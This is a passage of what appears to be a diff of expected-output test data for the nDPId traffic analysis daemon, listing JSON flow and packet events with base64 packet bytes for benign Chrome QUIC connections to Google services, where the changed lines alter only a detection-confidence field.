1aBtau7gu"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498081522,"flow_last_seen":1621498081522,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498081522,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":137,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498081522,"flow_last_seen":1621498081522,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498081522,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02310{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1621498081821,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498081821,"pkt":"AAAAAAAAAAQA8lpWCABFAAViYRtAAH4RYuSfdbB8xkodT+8SAbsFTm91w\/8AAB0ItDBJ3NIuqUkAAEU0OvufirbIDgp026bZbyRK+lP\/li5aeFJuMGsrKstuy5GNC2z4iOO\/abPbTq2u7PrmN1s1F6w0IR63u9BJRRqZsjR9rWd14KbZN92cuC6PwQZASSZ0PWLjMgW8lo8bo\/p4Ie0KGPVmarivxVc7f2b8bWK4ukJRx+v403t\/9CEnqZ+h1nQX3cV0q0wYsDcL4t89rZdkOD\/2h3Tynd0mKl+EfWaCiGCWZTFea00jKZkzOYtci+ntlHZ3vN\/5QVk+nvgSVijNAivrMJEWbvt\/Hgl\/NDn711tOaolOUN7VDWPKhmxO5E+Vj5qkX1JuMR3poM+ZzVmshiDYUYmCOo1\/EPh7BUBA8amQA2Pt5V1UAhZ6l6otPDcgPLAghQgMXkuAiTtWFzpRy1PsfSTGti0hwoBRmXcX4Osy85gPdkMPPjDRL9sxMWZ443WQaNmLu2NCZG76oV8Q9r6elrs8nfp6cokfwyjQiaj5lXdtmWez6Ub9zZ3hVLN4ZSFJ12MzBDXFLF17wXLFQVEwN3
J0hUvUhKsfZyTSVGXukr50e1LIUe5Vk3iGcV5os3CuVaG91MxXzApOzbVLLESlpzPGauzkLFu+7wEmphQ8EOGPzSKcgPkIYTuk7\/p1\/qR+e\/LIKLwmFLece51gXCJDFQ9PjUsal8fhmjAQtOvr6WTWXLColGnpvdaMDuQKB8HjmmpR9dJ4DqjExdn9ISewALk8HydNfk8Uvr3B+OVq71nszG8nTFPdSYSBzEWhRglIanWym5rO+STC\/8vTv\/W6q2hhkLWj1q0jtPjwAN\/v2Y+D0A4JyNLo2FkyIJcbWfplQ39A3\/xuxD3YAD12Vn57SeHhSWxO1uApQ+t+zJkEVcrhY9SKtmNwQm+6eVRxYFVqew4rn9K7lyAryiVHDQMrxz5ZBAq541Ty6HHtPWBecGy6gvo\/iT+yBnUFd6REWeOOlZ0VTsR\/AFub95hlY44g8UyeLChHkWygL0G4vYgPCQgWNuZWs1f3PFB3C1r\/neQaHWsEqXfzcFPI1Ve77J+5BsBQx73by2L8lYfyixggOPo7sTcoKYKSodtv9pgExVr24O4\/8tkR+15ZqhYeGxR91PaYugbzj67u+4OLdjdufEwK1FjqMmXfKMkZZSRgMY25aCKP6w9RpGPzU6xtd6n8eBrjegOuQMY2i7GThrYUeYiCj24dBR+A\/nS9Z4ny1MZWcp0jfK4ALWIdHAvCMvFkaEoCrswCG3q2FGMP67Qn27U7Cgdy6Ae8bOKa0gpwD67XIbZ3VnJtIZI7zP+FEhfUi0Yu6AMqmlLsv6OXFjKd16nwj\/J9CUoCsvFZj7Ux\/GRuDCul1XmrxN7CCNOU9OX+ADt2L\/fQyWzOZSvKiBhqpBtkk2TfqvuCvxVhzPhUfxCU++aidWCrZQZzSrwuajKW3QvMvG5Ss7lOXFiKY6un0x+VvjFLGtGPVVsETZAhpkxfy9vVl7cTojfKYb9BYI3it8kRtXGrW\/xIOQ9niF4V1PDpiubAYqMeNRlI3NLhOOvjMSc4gQyVKtScIYXdhvVAZtuM9Yabsw9P+8B5XyWEuXXKfq2yxLzBNvM0uXuRSEoFhzdgUADAIq7QcGiDu8G3IbB0DnhTLfiqNJcrjj5j8Y4Xh8KAEXft93SE+XzT7U\/L3dHtIrBdUdCUjN1yTskCC97fkKUSEv2nRSFu33ULAhr8XAIBTeRzax6cVNbIQtbTQqO2neCBmpL85f0DISj7eIkl89oCYMp+ZXfxIpCUVAU0uyKjoKpFGrNC11tb"} 
02321{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":1621498082422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498082422,"pkt":"AAAAAAAAAAQA8lpWCABFAAViYRxAAH4RYuOfdbB8xkodT+8SAbsFTriWyf8AAB0ItDBJ3NIuqUkAAEU0gEWSz79hSjx066IgEUilTttXNnBdxCIzGwyKgx22yggjYxUTOdMajr1\/eFj84LW0tWwiYEddNG1hbcYuTsjgufILsroj24Q3t\/uzrvR4hxlGIipIFKFQSdDIGcYBqlNqAaUOXFFDKWM\/NJ506Je2fGuUskxDQKAKr93NLTfrtVPjcaeEjkYt31c\/SZTL75GuaPT2mMN7etsFLArPTUK71+1V1afZAZptJCfmKCNVqwgGuD2i6NTmwkVh1735B38SS9NeTwvibpCCgqWLwGQceudYrYixpQsp4ysYS8hpI\/FAn\/wMbNYfLg0ULXfgBbdtqpqAz8gzjz6eyl\/Rpj5MNvbZVqNxScGru+OBXQwtVEZhxEtA00gRt2yig8vtLXbxeTHNHLvc1tr8ADnBwAus7BUb8Elx\/8QbOQJikFJzSqgm1q4x4Io\/yzHxvAmLnPsiEQqTqREOrKHfmlEHcPkGVkGtxFBNN+2k9aZL5JbmPRlBlC0G63qLufVXOEoqfGJNMZ\/r7nslJeVC3RVHNHRsnQaaVqTKCmjWU\/y1v6+B27XHPLKXFcBZGuXpvfdMRAsvAkwRzf8W8dO1sAukMkeYXN0V0P\/cdEmXv\/Mltpa5lcfPfiRw+bcfRkuNSD7Jc2b+iebax5ug8xwzr02wcXcQF4cGzsQyRZl7DyqI4QU91QrAsEcoHNeRg5JB1T9kQFDdcX\/REgLdvgMgBzxehG7z9OVH69vE5OHzw7pvnkoKe6J1pspEyN\/MZnsAVzaytYx30UuiyRgMISQWN1xfqum7\/YAiZINczHJ8y57E0O2FZW\/YNr4IpADWEzCYwTIu0x3DfRnVNbEZaadYGhViYNEY1zM28\/67i0wKSSLdh+0hygO1BEurBhEzdIroBw1lBfGNyfblV6uG\/7uEn55zpbG\/7qCk0ktkqTFveb6WXCOISST2J32xBVGziVeJsWONMPJ8Jm9PT1AEZcJwaHejFt9DpalZhmwFO8Enc\/ogZQaBxWPbFFyyuh9rvm6tNvA3jaeVh40hlLlIMUxPLddroFwYb\/9EO2mIWdQrHAdGk1Lh6AyJa6YfJKwGpm9NYCxghscJLthycNymVYnlH9ylQDmgmJl7hvnLAvwa32EnPRpWHAkiUhu0kcIqcpT2SkZyiu4cMABsnU3jPWri5+i7YqqcU8clEZP79ilHPctQYpBtvEKAmSD7Gg6PfMEKZqwwpeUK8+dTYIp\/o\/SmoPxYAZFC32OjsVAjSgBTgUFjJQtKJNO\/Q0n0\/Bx7FI53Bh8tOLKaMneKlT+LrkWYQa2IgT0Ubj9l8leMgakA+hFRx5nhKVT+gHy8BijJa8hM45tbFLGLuaHb+CeAqgmE\/m8Ud4ovePpufZDd3bW0o1jrz4rn0BX8tIkQy+IUYoxrBjuExnNvs4TRwyfTblAI\/I31W8aDB662jJlcg\/QE3btTahMgEReMXljoY\/ZRh
3u7JIQ6wjk22ntsR1sJRh2WFJh9oJxWsj2DyGf96xBV4z\/aPhEV\/yote5aKxrDNBeQknvp7Yhfy4En1FEvSZe8rUAbBQgDc1BHXrROj+FBZqKGH6sdegaKRirXJnQLUtUJ\/Q5NaDydpZmdgBmsplWOT\/sTyUwVugBQNQqk6\/7I37T4YBTN8nQWspDxdmEOSVvcWwSS7UJNsfcrNGCZpeXaEIJv\/\/lt\/H8+PibZ7H26DpmjUL7J1pXuNg9btTIv8GIPiixqfenNc2qdVBe95VLeHtbRIWFOipebc7xvKSmtYEtFRjvJuANVxLMqf"} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498083623,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621497523457,"flow_last_seen":1621497523457,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498083623,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"35.194.157.47","src_port":55561,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":141,"packets-processed":140,"total-skipped-flows":0,"total-l4-payload-len":189000,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":95,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":95,"total-idle-flows":94,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":431,"global_ts_msec":1621498212950} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498212950,"flow_last_seen":1621498212950,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498212950,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02312{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1621498212950,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498212950,"pkt":"AAAAAAAAAAQAR+RbCABFAAViDdxAAH4RAMSfdbB8gPgYAcFxAbsFTooVwf8AAB0I+oTf3zKXQjsAAEU0K2X81CUUYVNTb7c\/gt6K92g3k2uie+OA53gIgfaMNjNuH4MUMelKU6Fsw6sNfg5GG5qJ4eud2MFOn8X2tXhI8359esLfPp9WmlTfT\/oOrLme3MuOolugSEKcrrCVkd0LZuV6Av8DKVlHVrlpv0240Nf37vxag6C53FBDIOQ6LCd22JO5xn\/NaFOQBTN5MwhdXKe8H6r+EKu0MMl3i18CTaxer4Ec7N0oGrRomY7+OmgBg9TauzdMWJj0eYJFpdct9mnNghVe3E+WWeOHpf3NCjtkwso9os\/I1QOoZPXB9jwIdZ4Ne8+CuKTG+9tcqCFaaYPOS5DhXjQFlTS5J\/C8wry9mRLfPxmO1BQiHAFr6GP9Y5vWBsO1V2479WWJiBEJug410DZ3eaQ6ykeEHvnIbiMvMtSdXEZttkVySMQ31Fw9rOzeUgG+BPr2jhdWKXNu3NdlWiImj8cTTjQOxOtPhe\/+6Fx3ryMD+9KP13OjJpbH1TmVC3+wAJCtRp7htijDfs+djtrDtQtmYoljdKd6zc7r4DUgUx5a+lfJ+CQXmVSyc22sQwHuhLv4tZCwLDzjsfyd0tH+hoD7Qa72Swsvd9iN8a6VR5VOVL4dEXew+OVA9WCef4VgLk3PIXZKixpDLfYCSJ\/KS3IM1J4\/k8MH5DuYEu14a4bhYLVMzA+\/6Hh+TKT4leprgFJ91woRA3ZcHSFAFDQ6JNfWusZkMrX0kYWHzOn9N74ryBahTJAqZOQDKe7hgPc1zvzFZdQI\/CliH1lyvZkKhGurs+S8SAvkW327v1xIJ3a4v+knVz1HDiu9E8EjgQkT7KRHRIBqqKZ4ondbPabBq7uV6zq471LYqxhGKFGyoGxBVzr2DttB3Z3\/pwDEIs07QNSxcUKBzdZnJ6x2Fq+YkehrvOFCXOy3YCMutFzVwvOnQCidL8ohHIIWEgjIbGLfpHm\/0aWrklIqjrJSJ+rTPRW83W61p44YDEYx\/ac\/msD0XGRhWnBmicJsTwRBBV5svGieLeU0wwoRv\/LHI4mThjAG6AiLpvJ81A8npvcEWQ+MjQOgMjWQq72fQ6mncpsEh8naywuNoXmsIk4BB4ZGwmYN2ud9\/oZeqWqvV2B0k5gYpBOaiO5AHqvzEZdSTEayKAQ1YqXbuCf5QNmeckJiVyF6qNBoatmRZcQSwcZ\/T2ApNAyCKTurIastl6KeRV4+KqYzamhQB2W0\/ku7l9R8YLUGXIpbFAVZ0uF0OZyLqs\/v177JsDndRPefW+Nou62dLsU9VVlluBk+YGFmAONdyhN8iZeA5WCOwz3iTTD5N2bN8mMzQIgg7Bqo\/E8GIRug9o17TbkJUN0YnjfCIbHJtKaMHxL00NJbr3VzPT+M6M9yFXdxFqcigT0A\/lSoDVW1cjJ+LLyxe7NFjRQd0WXacjomlU\/vSqOt4d7QZrZUGLTeRU+r2gGG87IsvBtKso3QQR3flphwZ
gK4qieVr6KE53k\/ITHpCwbcQAfeWsRIfVZj5YsjA9TaaJLxpay1HiqTxUqZg3plTLPwXIAI2UEnJyFqlp3LNmknoPjV\/RJb\/wzVE1l\/2TAXdCsnVW4\/RvYAIgz1kbEyY+mdBPPmN7r0m+q1IFeOg5RTG+Hz1u5FTDjQLy9DaHat63UbFT45W72CQGLR1YbL59Rzmw7wT02BDrbjYMG5D9ap\/FxMB4LpXzY4OpaSIPgoD0IgD6kheO9CqpcZaNN6hMfIgQu+UTF39\/ec6XrRl9w5Mu88X6Qox2mOpT9nNb4CbMfitF4Z"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498212950,"flow_last_seen":1621498212950,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498212950,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":141,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621498212950,"flow_last_seen":1621498212950,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621498212950,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1621498213250,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498213250,"pkt":"AAAAAAAAAAQAR+RbCABFAAViDd1AAH4RAMOfdbB8gPgYAcFxAbsFTulVxv8AAB0I+oTf3zKXQjsAAEU0+eG2aeYr2ZwxMQeoNxrRVbNbZLWTAPBIHGmzPrHj\/mbYKL9ixyzcBxmQnCXQO1lDY0ds2+Uxd8ptUf0B8IEyK6HWt7XDMsSm0czLAJJ5gHVvFp4WvT2QOxWF9qk9uhVnOEbnpLXsHxpRz\/dz0mNah\/t9a+nz9avu0o52y0QKIy8LvNVm5rColse28vLMEqwFt8Yhb0a+e8F1WQ2Jog1lBFaxZ9C2nVaxdCT6fJgVQ6neO3NzPAYvQeMe31c7fRAOphOfBUEujT4YzhvNiFl\/wwufDbC02lbS32wQDoSwANLD4ijQelHtGYhgR48L98xirGA5IPv0nFtZ1GWdgn333AjOEIFGx3pnnuYgw2iuWo3m3sof14XdX\/TJRFaZuHV1ez9+gI2LSQdjuDaB+lcNc3pexpckY\/HKHazTzKBQe+fUELgAOI36zu7bwfiGs1DcCvWMT+vwQrQ74Yw8jk4Z4SiCS7DRZyln0DpQKDMsVHuAt0JxYrc8EmeYHpAa\/WU7imzzrVyCMqw87RX13BgCI3YyigtKRpDM25QuBSbMZz5ZYeiWXPyE1k+Y7t4UwBli+J1tJgOZYuGdHdpf4dfCgKgBpCB\/sV\/ZjdtG221HiWUjAFU\/RX+F4Sk2nlwgBk3Gu4HyZl\/faOlZ4A1OSdQ+fFuezBbnSGeaqbNo8VqozC+DV5QFVDR+iO+QWF73iaPEDFOX3fumQIGEeMxUCKQDbM3wtercBjGaPrgwSioQrTtGhXuk2URGocylTgSwqUuBqVOiZ6JtnYXVCLz0j3YmG54CGZRJwD6Hdzt9JYrpmq6dmeqLlnGt1boRR50qkJxmjqBOKv7Cl58UXZpi3hAhdW0L1aeY6VfIJ1ywx4a+S3Xag\/orC91PHKrMCiRMP7BHfcAHP3cmMHXdjD7rw9txJdTGOjn8lX\/mclH9lQGLRl1v1dxB91OITgYtiPUptU\/FstAfqQUeN7VbNzZ1K7myM4eKtKPa3VKJ41NTGXaN0jRG3AsJ1FJ1VXwFsxEXvqnYXdbQvqIAtWI7ORnGc4RUiKLZMaiOQ9ZpeJBxqsAYf5Ipe46sFpXilr18+FHg4XkhotA7suHK7WRKyC96nxR2DpEVf2iW1ectFaPFEKsQ\/H1YQbyGSNOyfsPh1j7faS+9snjbmdWCAfHpAxSqQjfbmAdHw\/pXpU8QfMr7cJSolfwHDFsekvEeA7haX+xyxiOvwU0xIpKlGttzlKe
9Zs+aw2lgL1+sWhZVxiXxt\/gUA3TRh0SsDzH5g+XZJd\/neVfv5Focg0swaZtgQXQlDD7IMT0JIkbpudBNxUJaoKkGBhyJSXW3YfdpVjMxqZHSyytUW2OsHTqTDxRLDFBCvuJkYPJ\/TXIpK0\/4wD4L9l0omgm3px2fr7Tg0bZjKBZqYFsrt3HkLtSGTbe9Cy8+JivD7AEnEUiKufzcgmavYoKzlmopX0FuwXrvI3Tehohc9Un3CymwmJwzoJogxWbDMhpF+zwoGBGss9an05aUuur3iz7Wxk0lUMrHG4RhjccCzdOjsiU0cpH7WOa3JeWnb8oZZ7E1yUHJnEa8TUN7DI2nHm7hd5xvO0jYRqfo5cwZY5XIuQteKO6d5vyOsi3XP6L\/1\/B2Ut2V2caOd42VO5fK9qvI\/d65vyKDadxtG52mLCNi3gzdraK+EO18KknpwVwSg5Jv0pduYOIgWdKxcr+HnXkkz+KrYNl2w\/cO6BHjE8z+P6ziiwIfrr6GWrGLS2PfoqxdL2ey08WkeqrNpvHrYQU2a4rs"} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1621498213850,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621498213850,"pkt":"AAAAAAAAAAQAR+RbCABFAAViDd5AAH4RAMKfdbB8gPgYAcFxAbsFTsNmzf8AAB0I+oTf3zKXQjsAAEU0TYW2wa0gBSRDkkdmZJDu\/pNSjmjccl+kQig5mlxVsILRFwOMT57XuOv8+xCb+87uWA9dkR3MCory+CSA9k9IwRunZJ+BETH5SfmpqFSP\/EAiXYBfiyWfexJyvvzdDNIlmXLEiyQv4ixIWJIO3WnbJCrbDZ9yN4PPh3+ZJeKdbL3pTJsxyDYJ\/K0AwIB3uSpy2ZQ7iPtPDkHhwAm0FbglERefDANRRCDt9UuWOODuqe\/eXcYzExeuApS5d3YIK4jhh64DClYEzzb+MKIc\/xPP+Kn3lPcPwqqIF0tNqN4kidjRAQThHdN0m2oore8VMpITgbE0pV1MgkL7lfnb1BmHdqPktFFVvg4M9R9oBo\/vgEDDJRAWAmGcmVRa5lB7oAaJdxN824d+GfIw\/1qMVVQy9mbPreGNJI5FA87uOjFOg\/W5J3F1z3HhaIyqbtwEoUGiMpxMkBVwhQJI\/NqiQ7cCTPyStz3iGYjK3gR\/9Bbw8+tTw5id8ub9L1LWEZk7DqKPgXVBJu8OGwqpaRMSGddcTDBphFbTHUszReIPXXK4fIJ8vnhXIbSCNh5usnBJYxXalGGyP1OwD2a79wMSUAPRbTRq3rslV5\/OoRSqu\/Zs+8jHkIPMW4LtxNfcjjkPK2kD4PebKMCHpmd0zooX6LnokRS4M4p0k3XmNrQeH1SNO7ooZjgdGcmI2qpnjZ50wZY0FVF84zFcfhdXiDRTgFPFrSaaxPf0z8xF0n\/P2TpBv6uEkyXD2A5+IeZFJHXEf9qwaBDrm596gwBmYOilpzlnw+vM13lluTV8LOtESGS\/vKE4CpcHhAcjdbP+1ymk+om1iitfEwkvvDF1j1qafTczkx30v4HqUJUwF\/9b61fj4o\/7elbSAAzfCZ7ESTNk2A2MHuqy\/5+jrriuO72nwy6Vjh
J+GulTPzobteW+l\/zBEckGEa8FJfTQdOStHqid4SXNF5RJb\/1ytpyxjnE0mVjMP42pjeQQpTUsUPMa9heF32n+XhzIkoHVuTsSW8KUDb8XsSKBKbYY1eJqV22PrlbamGDRPIeYyZxQrvseBe9ZGoW+ojFuhr345lGnNBRTbyV\/ifd+H3psrwilnpBQYZmIt3+yx5+Ox2Fl2MHXrWRMFlVHgyr3YspcY0pZlBmQSZOmPefZHN3UeMEoicflo7w5P9I2OILP+nrgTefS2ax7woPr2siuAHSliWnIFGW80aK6MX04MDmNfZ9qEi9D2uzji0WYs1aM\/FrXpTtqj1SPUWWhLEfXiBcjKNmhsqIUIEkrKDmesaaohHC3lT35CgqVB7Sitf+f3SeyMb+bWGart+IRgLgJBcEhEKoIoYkh0VLJVV9+doaDLpZ3HUz68vvJqjR7RJ0Gd5ED6cjJQuN+n45FpN9LmtbOssh2iF6qqJGi+PGx9q0M1M\/HUKAy5AN1S8YkWFsARDs59lonK62ZegV4vU1TBWQC7PGQRI84JNqfby2iYcagYspBzxJ+WakTI0qksHmy126F0+iqfIjkScGi9KPimhJZju3YFlyo6jNdjnvMmOvUUuhPQiXrORQ0r8qWWWh6tJ9HkW9sI2\/Ef1akHLftAxsOV4Tw7CFHLJLIsPfECdd0l00i7lyYzOrNaZMF3Kzp8XNi91vmLaBsXnvB9zagu0mQRRAnE0+1FdGlzcqDM+y0Fv02XWeM5LLndn5G6Ul+OdbTDl2ol0tkAwTNskAn08T2HhWOi5x48zrrAMi7Lm6AQyQ1v45a0okIW2FPRz\/fVqdN69MfaqHeQccEm1Iu"} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":145,"packets-processed":144,"total-skipped-flows":0,"total-l4-payload-len":194400,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":96,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":96,"total-idle-flows":94,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":437,"global_ts_msec":1621499083794} 
00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02307{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1621499083794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621499083794,"pkt":"AAAAAAAAAAEAO9I5CABFAAVijipAAH4RD1eokEAFubq3ucBBAbsFTq7MzP8AAB0IRh+k7PM1K8oANwAxa5vCXNWzfj2PGJr2ZJppn9nfh6Ikx8R\/J2n3pB6hj93tRIJPjf+f1DrhXIYFADw2Oc+Fr21E\/SBJZyXpa0us70tz46tHGmOeBrCokS3GTXPLNs2f7i6PVg5iYBx2tk44g5C8Qs71ezbhVdCLpeHqgEt\/KgFUjX37SuS08dzh1hVBp8Jk3e+0\/4OclX8JP31qwN8hw4wkaeOcFhqGvTvb7GXAVee+0nZmchwlYaeZu2t0+br+FVqhd9lHLvrcyz7DhDlFCTLeKywE2b3EdmYTKWQbL+AaOaELDauoXSTh5q70gLIFBtuSXXAm1sLAL+gBd6WGAsCkwCZK7IBbXbpfWhwnxlVgDIPibi\/nJn1TA586o7oqTn7ceMNjjzs6CB4Mgf4cOzn1YbtrCp\/6c+BO8SdxtB5t2vkCmwP5K7T6LfjBIuFXQ2o66LBu8vSKvZAtVO2yj+LkUyzGXrYGwfv92RyYG7LfM\/qS18M93d\/jLQZxmPy5y